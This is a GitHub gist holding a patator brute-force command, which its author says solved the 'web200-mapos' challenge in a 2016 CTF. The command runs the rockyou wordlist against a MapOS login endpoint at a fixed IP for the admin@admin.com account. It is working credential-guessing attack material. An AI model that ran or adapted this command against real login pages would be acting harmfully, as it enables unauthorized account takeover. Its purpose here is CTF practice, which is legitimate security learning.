Skip to content

Instantly share code, notes, and snippets.

@intrd
Last active March 3, 2017 06:02
Show Gist options
  • Save intrd/9e5f4d4ae72b46f4abe35ffe982dc3cf to your computer and use it in GitHub Desktop.
Save intrd/9e5f4d4ae72b46f4abe35ffe982dc3cf to your computer and use it in GitHub Desktop.
Mapos patator bruteforce script used in web200-mapos @ 3dsctf-2k16
## Mapos patator bruteforce script used in web200-mapos @ 3dsctf-2k16
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
# patator.py - https://github.com/lanjelot/patator
python ~/appz/patator/patator.py http_fuzz url="http://54.175.35.248:8008/index.php/mapos/verificarLogin?ajax=true" \
method=POST body='email=admin%40admin.com&senha=FILE0' 0=~/dics/rockyou.txt \
follow=0 accept_cookie=1 --threads=2 \
-x quit:fgrep!="Disallowed Key Characters.",fgrep!='esult":false' -l data --max-retries=5 --start=3000
#--start=3000 starting from rockyou.txt@3000 password, set --start to 0 to start from beginning
#-d to debug
#http_proxy="http://127.0.0.1:8080" #to intercept/debug on zap/burp
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment